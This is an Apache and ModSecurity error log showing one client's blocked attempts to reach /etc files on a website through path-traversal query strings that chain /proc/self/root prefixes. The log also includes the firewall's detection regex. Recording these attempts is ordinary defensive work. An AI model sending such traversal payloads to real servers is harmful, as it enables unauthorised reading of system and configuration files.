[Tue Mar 17 14:32:28.132152 2026] [:error] [pid 2473:tid 140411699963648] [client 74.7.241.31:49696] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/groff"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQLKBJNF7axNlVR0UZhwAAAAU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:32:32.451952 2026] [:error] [pid 7437:tid 140411624429312] [client 74.7.241.31:49706] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/issue.net"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQMAeiSKl8TjouI-YbkgAAA84"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:32:35.322399 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.241.31:49708] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:fileloc. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:fileloc: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/vimrc"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQM9Y0UrI5A3LftIz98wAAAY0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:32:36.917314 2026] [:error] [pid 2473:tid 140411691570944] [client 74.7.241.31:49718] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/security"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQNKBJNF7axNlVR0UZiQAAAAY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:32:40.129826 2026] [proxy_fcgi:error] [pid 18380:tid 140411683178240] (70007)The timeout specified has expired: [client 179.188.53.243:39750] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:32:41.422096 2026] [:error] [pid 7437:tid 140411649607424] [client 74.7.241.31:56196] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/alternatives"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQOQeiSKl8TjouI-YblAAAA8s"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:32:42.756138 2026] [:error] [pid 17965:tid 140411725141760] [client 74.7.241.31:56210] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/portreserve"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQOqt8Nd0UC_OcbVHMzwAAAII"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:32:44.006227 2026] [:error] [pid 2598:tid 140411666392832] [client 74.7.241.31:56220] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/openldap"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQPBj0p0SRWAqcjGF7dQAAAwk"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:32:45.311794 2026] [:error] [pid 9299:tid 140411624429312] [client 74.7.241.31:56234] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/firewalld"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQPb-sgTmmJoPuMdy4UgAAAs4"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:32:46.606780 2026] [:error] [pid 29151:tid 140411540502272] [client 74.7.241.31:56248] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/puppetlabs"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQPvPqhzTj3BvfDX-J8QAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:32:47.904299 2026] [:error] [pid 2473:tid 140411540502272] [client 74.7.241.31:36070] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/terminfo"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQP6BJNF7axNlVR0UZjgAAABg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:32:50.185153 2026] [:error] [pid 17965:tid 140411548894976] [client 74.7.241.31:36082] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/telegraf"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQQqt8Nd0UC_OcbVHM2AAAAJc"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:32:51.482320 2026] [:error] [pid 2598:tid 140411733534464] [client 74.7.241.31:36088] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/plymouth"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQQxj0p0SRWAqcjGF7eAAAAwE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:32:53.259442 2026] [:error] [pid 6296:tid 140411632822016] [client 74.7.241.31:36092] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ppp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQRXIk7brgkOH-rIWNpAAAAU0"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:32:57.287361 2026] [:error] [pid 19507:tid 140411557287680] [client 74.7.241.31:36094] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/raddb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQSdY0UrI5A3LftIz9-QAAAZY"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:33:00.091935 2026] [:error] [pid 9299:tid 140411733534464] [client 74.7.241.31:58130] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/dovecot"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQTL-sgTmmJoPuMdy4WAAAAsE"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:33:01.737602 2026] [:error] [pid 7004:tid 140411582465792] [client 74.7.241.31:58138] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQTcU6Sx0TG1YjmQixCwAAApM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:33:03.347316 2026] [:error] [pid 7004:tid 140411649607424] [client 74.7.241.31:58144] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQT8U6Sx0TG1YjmQixDgAAAos"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:33:03.349647 2026] [proxy_fcgi:error] [pid 2473:tid 140411708356352] (70007)The timeout specified has expired: [client 179.188.53.243:40086] AH01075: Error dispatching request to : (polling)
[Tue Mar 17 14:33:05.667540 2026] [:error] [pid 2473:tid 140411582465792] [client 74.7.241.31:58150] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cloud"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQUaBJNF7axNlVR0UZlAAAABM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:33:06.933456 2026] [:error] [pid 29151:tid 140411540502272] [client 74.7.241.31:58164] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/ipmi"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQUvPqhzTj3BvfDX-KAAAAAdg"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:33:08.273045 2026] [:error] [pid 2473:tid 140411565680384] [client 74.7.241.31:33102] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQVKBJNF7axNlVR0UZmwAAABU"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
[Tue Mar 17 14:33:09.579169 2026] [:error] [pid 7004:tid 140411658000128] [client 74.7.241.31:33118] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc/rsyslog.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abmQVcU6Sx0TG1YjmQixEQAAAoo"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/etc
